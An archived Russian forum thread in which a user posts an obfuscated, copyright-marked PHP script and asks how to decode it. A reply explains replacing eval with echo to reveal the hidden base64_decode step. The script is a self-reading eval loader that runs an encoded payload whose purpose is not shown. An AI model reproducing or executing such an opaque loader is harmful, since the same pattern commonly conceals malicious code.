Обфускация кода (вопросы, просьбы зашифровать/расшифровать скрипт ) [Архив]

Alex$09

01.10.2009, 22:06

часто просто помогает подстановка "echo" вместо "eval", и анализ кода
Можно поэтапно рассказать...?
И пожалуйста декадируйте код

<?php /* Copyright 2009 Nikolay Konokhov */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72% 61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4} .$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO000 0O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$ OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000 {11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O OO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7 }.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO0000 00{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$ O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0 O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OO O000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{ 16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO00 0000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__ FILE__;$OO00O0000=14324;eval($OOO0000O0('JE8wMDBPM E8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzA wT08wMCgkTzAwME8wTzAwLDB4NDk5KTskT08wME8wME8wPSRPT 08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzB PMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY 0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSs vPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ 2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZ hbCgkT08wME8wME8wKTs='));return;?>kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ 4LT09NHr8XTzEXRJwmwJXLT09NHeEXHr8XhtONT08XHeEXHr8P kr8XTzEXT08XHtILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydm OlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1s AunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUA pRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1 fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTz EXhTslfMyShtONTzEXTzEXTzEpKX==tLnzcbYzDB9Vb3Y0Cbk0 htL7tLnlFmkvFl9ZcbnvFmOpdMFPYZL7tLnpdMlgF2a0htfLDb YXdoy5b2aZFM9ZFZFSfuk1cUL7tLnpdMlgF2a0htfPfo1Sb2aZ FM9ZFZFScMySF2ApKXpLcBcpdMAPk0OnaryHUAcyOA5uUA5ykZ x0FmalhTShcoaMDB5lhtfUT09Ab0OkAJFSkZ4VRZ4VkZL7tMOl cMlVcUImOA5uUA5yb0OkAJFSkZ4VkZL7tMlVC2x1coAIOA5uUA 5yb0OkAJ4mR2OiforvC29VcMlmRmnPFtF7tLnpdMYSfBOlb29V C2AIAL9Nay9rUawVkZ9SCB5mfBymcU8mRJOjd25MDBfdk2xidM fzk10VkZ9ZcBclFMaZRMxVcZF7tLnpdMYSfBOlwtEPOA5uUA5y b0OkAJ4mR2OiforvFMaMcbklFJ5XcbkMRmnPFtFpKXpEDB5jdu aLcUEIhraKO0lKOa9rUawVkZ9LCbOiR3klcMaZcbwVC29VcJ5X DuEmhTShWolVC2x1coagd25jcUEPk2aVc2lVcU9iFoLvCbnpRM YSCbYzRmnPFtFpKXppcJEPkoYvdMcpc1SmDuO0Fy9Pd21lb3aZ dtffwe09wtwJhUn7tJOjd25MDBfdk2i0fungDo9sca91FMXmbU E9woa4FoxvcoAPwMaVc2lVcU9iDMy4R3klcMaZcbwVFoiXwJXL b1YyAlcyAlSmAriWb1YyTrCmbUL7tJOjd25MDBfdk2i0fungDo 9sca91FMXmbUE9wuklF2a0htOjd25MDBfdk2i0fungDo9sca91 FMXmbUL7tJOjd25MDBfdk2i0fungDo9sca91FMXmbUE9wtkPfu OXKJ8vwJ4Lb1YyAlcyAlSmUyOAAy9wT1YAk10VkoYvdMcpc1Sm DuO0Fy9Pd21lb3aZdtffKXp9tJOSDBYgfuwINUnMCBxzcTShku YpfoagD2a5we0IF3OZb3klFoxiC2APwmf3fZ4JRtwJRuY0FmOv do93cbwPky9TOakBOakdk0iAayngUr9TatffhUL7tJOzDbOlb2 slGUE9wo1LYUisceAPCMyzcTC0b2aVC29LcUisceAPk1SmRJOz DbOlb2slGU4mbaS0HzWzYy0mhULphTShDBCIhtOzDbOlb2slGU E9NUELC29VcM1zBZfqcbLmbULIkoxpC190FJE9wuOZfBA7tMlM htrLdoljb3OZhUELC29VcM1zBZfMfB5jb2YvFulZDBfPftffwe 0IwmllFZw7tMc1dMY0DB9VwuklcMaZcbkgCMxvC2sgcB5LwtIL FMaMcbklFJLIGXpmdo9JCBXIkoxidMfsFZXLcoxlb2yXDUXLC2 9VcM1zKXppcJEPkoYvdMcsF1SmcmaVC19jd3n5FMlmDuWmbUE9 NUEJGBazwJLIGXPLC29XGbkpc2i0wt49wtw8col2woySDBfVNa XJFMlmDuOFwJnzfulScT1FwMcvdmWsF2l6cTPIKbn4KZnXCBOL DB5mRbkpc2i0KJEzFuI7btw+W29XGbkpc2i0wtcjd3n5KZE8CU nPFMaMNaXJDuO0FePvR2flfoOScU5vFMFVFmAvbtwIfoyZc2a0 NaXJb2kSCB5qbtwIF3O5doA9btk0cbi0RBOlC29ZCbOpd246wo 5vdMA7wocvdmWsF2l6cTPIKbn4K1XJNLflfrOHOTXvCT48R2Op fj4JKXp9cBxzcUELC29XGbkpc2i0we0IwJw7tMlMwtIikuklcM aZcbwpwtOZcBclFMaZwe0IkoxidMfsF1SmdM9gF2aifukidmHm bTShkuklcMaZcbwINUELFMaMcbklFJ4LC29XGbkpc2i0KXPLco xlb2yXDU0+F2y2ca90d19jCBYPcUEPwtfZcBclFMaZb2kSd2Yq kZXLFMaMcbklFJEpKXpZcbO1FM4IkuklcMaZcbw7tm0hDBCIht OgALaOaAaTaySmd3n0DB9Vk10pwuShFMaxfBlZca9vdMYlwraK O0lKOa9rUawVkZ9jdoyzF2azR215F3ySRmnPFtF7tmklFbapFM agd25jcUnyTLfkTLagOrlURJFvcoy0CU9LCMYvdMcpcZ5XDuEm KXpZcby1Dbklb29VC2AIAL9Nay9rUawVkZ9SCB5mfBymcU8mRJ Ojd25MDBfdk2xidMfzk10VkZ9ZcBclFMaZRMxVcZF7tJOjd25M DBfdk2YPCbkzcbWmbUE9wtILdoyVc1SmC2iiFmYlftffwtr9wt FmhUE/koxidMfdk2YPCbkzcbWmbUE6wtOjd25MDBfdk2YPCbkzcbWmbT ShFMaxfBlZca9vdMYlwraKO0lKOa9rUawVkZ9pdMHvDB5jduaL cU9MfB5jfolvdmHVDB5jRmnPFtF7tmklFbapFMagd25jcUnyTL fkTLagOrlURJFvdB9LfBxlFZ9zDbOldo9mDB4VFoiXkzShgWpp cJEPky9UOayaOaYABZfvFuOpd24mbUE9NUEJCBY0Dbcifolvdm HJhUn7tJOLd21iDB4INUnzfuk0d2xvf2aZhtOgA0aUaLaUBZfw ayOWb0iNA1WmbUL7tJOqcbLINUn0FMlshtOgALaOaAaTaySmD2 a5k10pKXppcJEPwAnMDBxlb2flfy9jd250cB50FZIJDuO0FePv R2flfoOScU5vFMFVFmAvcbi0FMyzR3klcMaZcbwvC29VdMajft 50GuWJhULhGXpLDBAPwjxLDbCIF3O5doA9btkJCBYqc3kvfB5L KJnSDBfPfulldoxvfzsJd3kLcbw6Hbn4woOvfuOlctnZc2wPHT LXRer5HtXxKTEpKZnXCBOLDB5mKJE1FuI7woYvdo9ZKJYoOjC2 YjC7btwIC2xiF3H9btkVCbcpc2y0DB9Vbtw+XKqZ6KRI9Vj/wKzV5NNq/Zes5Uei++vIwK/X7Vjm4VbL5G3IRtes5Uez5Keq7vu8wNNx8Ves7VRP8vXI7+7L6 Vv+9+bs6KAI6Jez5Keq5G3s7VzzwNul8KRl8NHVwH/V7/eV4gNp8VAI7+7J8V7X6NR8wKeQ8VjJ4NdP/Jes5Gzs7VNVwK/V5+Ts5GAVNt9LDbC+wJL7tm0hDBCIhtrLD2a5hWp7tMOpcUIJN oOpfJnzfulScT1FwMkiC2smFM91dMW6woxpc2i0GBaSdo93K2k vFMOlFjPxFuIIco90foaLwukmCJIxKTESHTLXRer5HtL7wunic oOpdMF6weaXGeSIC29Sd3w6w0coYjC2YjsFwJnjdoyzFz1FwM5 ifMlmCbOpd25Fwj7A7veS4tes5Uei++vIwKgI7+7q7Gbs4tXI7 +7J8V7X6NRlwKRJ7VWI6Vv+9+EiNt9LDbC+wJL7tm1lduYlwuS hkoivF3W9k3f3fZ5mcbOLdoAVd3kmRmk1kzShkunifoI9kZ9lG uOZCbHvFMaMcbklFJ9iC3OpfMy0cU5XDuEmKXPLFbalFmLINUE Jco9sCBlVNbSLco9sCBlVgUcqcbL9GZOqcbl9wjShDBCIhrnMD Bxlb2flfy9jd250cB50FZIJDuO0FePvRZwVkoivF3WVkunifoI Vwj8JRJOxfBaZGULINT0IwmllFZwpwuShDB5jduaLca9vdMYlw tiyTLfkTLagOrlURJFvcoy0CU9ZcBclFMaZRMYvdMCVFoiXkZL 7tJOzDbOlb2slGUE9wuY0Fl9ZcbnSCBYlhtk3f3FVwJXJwJxzf uk0d2xvf2aZhtOgA0aUaLaUBZfwayOWb0iNA1WmbULpKXPLF2l 0ca9qcbLINUnsceAPdBW1hokiF2A2Yy9ldMYvcoAPdBW1htfdk Z4LF2l0ca9qcbLVk11dYeH0HzOfkZLphUL7tJOjd25MdbYdk2s lGUffwe0IkuYpfoagD2a5KXPLDoyVcoxlFJE9wocvFoaVhraKO 0lKOa9rUawVkZ9LCbOiR3klcMaZcbwVC29VcJ5XDuEmRtk3wJL 7tMc3FMl0cUILDoyVcoxlFJXJNe9WUynFFlxVbtOjd25MdbHIN UniFmkiGUEPbukFdJwpKXpMd3klCBYPhtOjd25MdbHICbHIko5 idBAINT4LfMySfBAptmShkucidualNByLcuYSCbYPcbHPkucid ualhTShcmfZDbOlhtOPCB5LdoaZRtwmGZOVCB1lgUFINT4Ibtk 7kucidualgaXJRyxZbo4JhTShgWpMf3kpfoAPkoiidMOScbwSw JL7bukFdj8+wJL7tMcjdo9zcUILDoyVcoxlFJL7tMOpcUIJNoO pfJnzfulScT1FwMkiC2smFM91dMW6woxpc2i0GBaSdo93K2kvF MOlFjPxFuIIco90foaLwukmCJIxKTESHTLXRer5HtL7wunicoO pdMF6weaXGeSIC29Sd3w6wzC0Czw0YTsFwJnjdoyzFz1FwM5if MlmCbOpd25Fwj7n6+ej7VTI8KjSwHRI8Uem4tev7Vqz7+qzwK3 I+Kbj7JeS7VTz6/8VwH3I5Kbl7Nu/wNgZ7JeX4KuV8VEI8Ues6KXI5K7x8VeJ6NwIXVeSwNRV6/zQ7Jez5K7J7Vv88gRJ6KAiwH7i7G7J6NRlwNuZ8Kes6NdzRte3 8V7i+Zev8Kjx8vNv6NR8wKPI8Kei7vRlwTXvcol2NJwpKXp9cB xzcUn7tMOpcUIJNoOpfJnzfulScT1FwMkiC2smFM91dMW6woxp c2i0GBaSdo93K2kvFMOlFjPxFuIIco90foaLwukmCJIxKTESHT LXRer5HtL7wunicoOpdMF6weaXGeSIC29Sd3w6w0coYjC2YjsF wJnjdoyzFz1FwM5ifMlmCbOpd25Fwj7E6vRP4Ve26N8IOoy0CA xpcMAIOB5mDB5lwK3lwKu76+EI7/eV6KgJ5GTl7GESwKRJ5GTl7G375UeL4K3s++AI7GAI8G7V8VRl 8vuZ4vN+8Jes5G7i9G7L6Kz77tXI6+ji7JeL4K3s4N8I6V7v6N 8I4gvq4tez5VAI4KqZ6KRP8K7J4K3IwK3IwKTX8+NV7tex5geJ 5gelRjXvcol2NJwpKXp9tm07tm1lduYlDBCIhtOgALaOaAaTay Smd3n0DB9Vk10INT0IwMYPcBYqDB5MdZwpwuShDB5jduaLcUny TLfkTLagOrlURJFvcoy0CU9ZcBclFMaZRmnlFMCVFoiXkzShDB CIholVb2yZFMy5htOgALaOaAaTaySmF2l0cUffRtOldMfpdMaz hULIky9UOayaOaYABZfzDbOlk10INUELcB5mDB5lBZOgALaOaA aTaySmF2l0cUffbaSmHtffKXPLfbkSwe0IF3OZb3klFoxiC2AI htf3f3FVkZXmkZXLb1kyAaayA1Odk3YpfoAmbUL7tMc1dMY0DB 9VwoflfrkiFLYchtOgfbkShUn7tJOgfbkpwe0IwMi0fuE6RZ9J CbwsdMy2DBFVGByVcoa4Rmk1R3A/fMaZNTwMfbkSNUwVtmaZdoaVC29LcUILb3aZdtLVwJczDo93NT rJKXPLcMWINUnEcM9XcB4Pky91FMLSwmwJhTShDBCIhtOMctLI GXp3DolScUEPkok1cMclFJE9wocmcbOzhtOMctX0HeL2hULIko iiGbY0CBYqRj0LCmaMcMaZKXpMC2xvF2APkocLhTShFuklc19s CbOjDtIJRzx0C3LIFMyVcz1FwJIVhJlFwJn2CBx1cT1FwJIVhJ lFwlXvNJ9pF1AJREPLDoy5F3OiC2SSkoY5hTShFMa0fbkVwtip dmWpwtOjGaSZbTShgBaSF2AIFMa0fbkVweE7tm0hkofvd2fScB ivF3W9k3Ovd2xJCbkxfBaZDBazRMfvd2fScU5jd20mKXPLc29v c2xlfBr9k01vGMlSdorvYU4XwtibDB5Ld3fzKZnaKZnbDB5Ld3 fzwr5AweAVHTSIcB4saaH7wuk2KjrVKt4XRjCpwrflC2svRzwX HeCXYzw4wrcpFMaMd3IvHU41kzShcmaVC3Opd24IA3OZao9KfB 0PkyY0FJXLW2ilC2SSkr1ic2ljhUn7tJOkdmWzHlaVDbWINUE0 HjL0KTC3HjL2KXPLdoaVc3OPwe0IF3OZdoaVhtOTfuwpKXpMd3 wIhtOpwe0IHeSLDUE8koxldMf0DeSLDUSqhUn7tJOeDoajDZEQ NUELTBymDBH7tMlMwtILW2ilC2SINj0IkrlVfeHZaB5pftLIGX PLW2ilC2SINUEPkrYPcBYqwt0LUB50HzkadMl0wtPIholVftLI htOeDoajDZEvwtOkdmWzHlaVDbWphTShkrYPcBYqwe0IhtOeDo ajDZE8RTwxYeF0KeH2YeIpwe8PkrYPcBYqwtSLUB50HzkadMl0 hUE6wtOeDoajDzShgWPLW2ilC2SIhz0Id3kLhtOTfuk7kol9hT ShgWpZcbO1FM4IkrYPcBYqKXp9tMc1dMY0DB9VwriiF2iaALXP kyY0FMlVcZLIGXPLW2ilC2Sxwe0IA3OZao9KfB0PkyY0FMlVcZ XXGer1HeASHuIZHUL7tJOeDoajDzwINUnTfukAd051dUILA3OZ DB5mReESHuIxHeEzOJL7tJOeDoajDzrINj49wew7tJOeDoajDz rINUEPhtOeDoajDzrINj40hUEMHuIzOLcoOLHXwtLIgtILW2il C2SxwtCXGeYohTShkrYPcBYqHUE9wtIPkrYPcBYqHUE+NjWpwt CXGeYoOLHXHtEpwuXPkrYPcBYqHUEMHuIzOLCpKXPLW2ilC2Sx we0IhtILW2ilC2Sxwe4+YtLIkjn4H0HXHeEIhUn8htOeDoajDz rIkjn4H0coOJL7tJOAHUE9wtIPhtILW2ilC2SxwtCXGeYeHtLI NeX0hUn8htOeDoajDzrIkjn4H0HphUE8NewIhUn8htOeDoajDz wIkjn4OjnowtL7tJOAHJE9wtIPhtILW2ilC2SxwtCXGrcoOLce HeEXhUE8NeWpwuXPkrYPcBYqHUEMHuIzWzEXhULINeXXGrrpwu XPkrYPcBYqHJEMHuioHrCXHeEXwtL7tmklfuaZdJEPkyWxwuXL aewpKXp9tMc1dMY0DB9VwrYPcBYqUoyzDtILUoyzDo51dULIGX PLW2ilC2stGbOlwe0IHeShkrcSCBFINUEXKXPLUoyzDyY0FJE9 wuYXFMlVfoCPkZa1kZXLUoyzDo51dUL7tJOScB5mfoIINUnzfu kScB4PkriiF2iTfuwpKXpMd3wIhtOpwe0IkoxldMf0DtEsHTSL DUE+NUEXKZOpwt0shUn7tJOUcUE9wtOwCbYPA3OZGZOpgTShDB CIherINT09wtILOMxicZElHJLpwuShkyklwtS9wtOUcTShkykl we0IholVftLPkyklwt8IHTEpwtSPkyklwtAxHtL7tm0hkrYPcB YqWml0cUEqNUELAMA7tJOodoymwtSqKXp9tJOeDoajD0k5foAI kT0IHTE7tMlMwtIXwtr9NUELW2ilC2stGbOlhUn7tJOeDoajD0 k5foAINUExHtEskrYPcBYqWml0cTShDBCIherINT09wtILOMxi cZElHJLIhUn7tMlMwtIxwe09NUEPkrYPcBYqWml0cUElHJLpwu ShkrYPcBYqWml0cUEqNUE5KXp9tJOeDoajD0k5foAINj49wer7 tm0hgWpZcbO1FM4IkzFmRJOeDoajD0k5foAVkriiF2iTfuw7tm 0hcmaVC3Opd24Ic2a0C2IPkuaZdtLIG3klfuaZdJneDoajD0ii F2IPUoyzDyaUTtILfbkShUL7gWpMfB5jfolvdJnmcbOXFJILfb kShUn7tMfSd2kidtELc29vc2xlDo9zftXLc29vc2xlfBr7tJOj DtE9woflfoYPhtO1FMXpKXPLcmEINUnEcmYvC2svFoaVhtOmd2 9mdoaPd3Y0ReIXRtOlFmkVdZXLcbkZF3OZReHXhTShDBCIhtOM FtLIGXPLd3a0we0IwLfyatEvF2aiFMYPN2YSDBaVfe1VCbcjdo lldmWsCba0dZcjDe0LC2IMcMaifuaZcbH9AMyVDZcxNBlVcM86 kuaZdtnwayOWRzrVHaxZbo4JKXPLd3a0wt49wtkaF2aZRAymcB 50KJELc29vc2xlfByFFlxVwjShko91ftEVNUEJUo9zfePIkofv d2fScBivF3OFFlxVwjShko91ftEVNUEJW29VdMajfolvdjPIW2 xvF2aFFlxVbukFdJw7tMc3FMl0cUILcmESko91ftL7tmfPDBxl wtIicMavcJILcmEphUn7tJOLCbOiwe0IcMflfuHPkocXRerZKt L7tJOXd3HINUnzfukXd3HPkoOiforSwlkidMsgwJL7tMlMhtOX d3HINT09wociduYlhbs9cBxzcbShkunZNbY1CmY0FJILcoy0CU XLFo9zwtS5hTShkunZNbOZDB0PkunZhTShkunZNbY0Fl9ZcbnS CBYlhtkFdJwSkZFSkunZhTShFMa0fbkVwtOXFjShgWp9tMcjdo 9zcUILcmEpKXp9tm0hDBCPwBflfunZhtO1FMXphUn7tJOXFJE9 wtwXwjShgBaSF2AIGXPLFuwINUnmcbOXFJILfbkShTShgWPLfo ljwe0Ic2a0WMyZW1LPwMi0fuE6RZ8JRJO1FMXpKXpMfB5jfolv dJnLdB96htO1FMXpwuShkunifoIINUkPfuOXKJ8vF2aiFMYPRM Osd3PVd3kmR2YmDU1JDB4vF2aiFMYPN3YlCbkjDe0JRmY0Fl9Z cbnSCBYlhtk3f3FVwJXJwJXLfbkShTShDBCPwBcpdoagcbipF3 OzhtOXCbOPhULIGXPLcoy0CUE9wuY0FMlXb3Oic3HPWolsFoxv coAPwJwSWocpdoAPkunifoIphUL7tMlMhuY0FmnvFZILcoy0CU XJTM8IT3nldJnrDbklC3OvFmLIAukvDMajftnZcbY1duOzwocv fB5LwJLpwuShkuklF3aSfuHINUEmNorIfoyZc2a0NUkgCMxidM SJwoiZcBC9wMi0fuE6RZ9zcByZC2IVco1vGJ5vFMFvC2fpRBkp dJ9zcByZC2I/F2aiFMYPNUFVF3OZb3klFoxiC2APwmf3fZ4JRtwJRtO1FMXpRJ FJNS3lwK7v6NuI7TXvCT4mKXp9cBxzcUn7tJOZcbY1duOzwe0I kzxiwuOiFMflfe0Jb2kSCB5qwJnPFMaMNUkPfuOXKJ8vF2aiFM YPRMOsd3PVd3kmR2YmDU1JDB4vF2aiFMYPN3YlCbkjDe0mRmY0 Fl9ZcbnSCBYlhtk3f3FVwJXJwJXLfbkShU4mwj7y8gR8Nt9iNJ F7tm0hgBaSF2AIGXPLFMazfBx0FZE9wtgs5gwI5Kes7gv1kzSh gWpZcbO1FM4IkuklF3aSfuH7tm0hkup1FMXINUnXFMamb3klFo xiC2APwJ9Ghoi0fuE6bt9FRZLvDUwSwJwSkuaZdtL7tJO6fbkS we0IFuklc19ZcbnSCBYlhtwvbt8PRJPpkt9pwJXJwJXLGmaZdt L7tJOXCbkzca95CUE9wrnMDBxlb2flfy9jd250cB50FZImDuO0 FePvR2kiFJ1VCbcpcZ55CB5LcbIVFmAvfT92cbw9HJczDo93NT HZkmaZde1PfuOXKJ8vkZ4LGmaZdtL7tMc1dMY0DB9Vwoflfy95 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 2aZb2iiF2ImbUEiNUELcoxlb2xvc2lVb2iiF2IpwuShcollwtI JcbkZd3wJhTShgWpLDBAPwjxLDbCIC2xiF3H9btkZcBclFJ1Lc BxFwJniduW9btwJRJOSCB5mdbYdk3YlCa9LcBxlfoagDB5MdZf fRJkFwj4JRJOSCB5mdbYdk3YlCa9LcBxlfoAmbU4JNt9LDbC+w JL7tm1lduYlDBCIhtOgALaOaAaTaySmd3n0DB9Vk10INT0IwMY PcBYqfbnLwJLIGXPLfbnLCbOlwe0IWocpdoagc2a0b2YvdmOld mOzhtkPfuOXKJ8vf3f3RMflfoOScU5vFMFVFmAvcbi0FMyzR3k lcMaZcbwvfMaZF2lvdJ50GuWJhTShDBCPkuaXcoy0cUE+koxid MfsF1SmfMaZF2lvdJffhUELDB5MdZE9wtOSCB5mdbYdk3klcl9 1FoOgHermbTShcBxzcBlMhtO1FoOifoAINT0IkoxidMfsF1Smf MaZF2lvdJffhUELDB5MdZE9wtOSCB5mdbYdk3klcl91FoOgHew mbTShcBxzcBlMhtO1FoOifoAINT0IwJwpwuSLfbnLCbOlwe0Iw J0swjSLDB5MdZE9wtOSCB5mdbYdk3klcl91FoOgHeHmbTs9tMa SF2apcJILfbnLCbOlweXLdoyVc21zBZf2cbkzDB9Vk10pwtOpd Mcvwe0IkoxidMfsF1SmFMaMb3aXcy8XYtffKXpLDBAPwjxLDbC IF3O5doA9btkJCBYqc3kvfB5LKJnSDBfPfulldoxvfzsJd3kLc bw6Hbn4woOvfuOlctnZc2wPHTLXRer5HtXxKTEpK3nicoOpdMF 6weaXGessCbkmDB4sfo9XKJE3FuI7dByZc2lVRbkpc2i0KJExH un4K1XJNS/V8Gvl5K3//ZeJ5gex6N86wtwVkuaXcoy0cU4JwtIJRJOpdMcvRJwpNt9LDbC +wJL7tm0h

Zedi

01.10.2009, 22:29

Вместо евал подставляешь echo чуть ниже вместо $000000 базе 64 декоде, короче экспериментируй:-) там все легко просто мудрено зашифровано название функции base64_decode

morpeh007

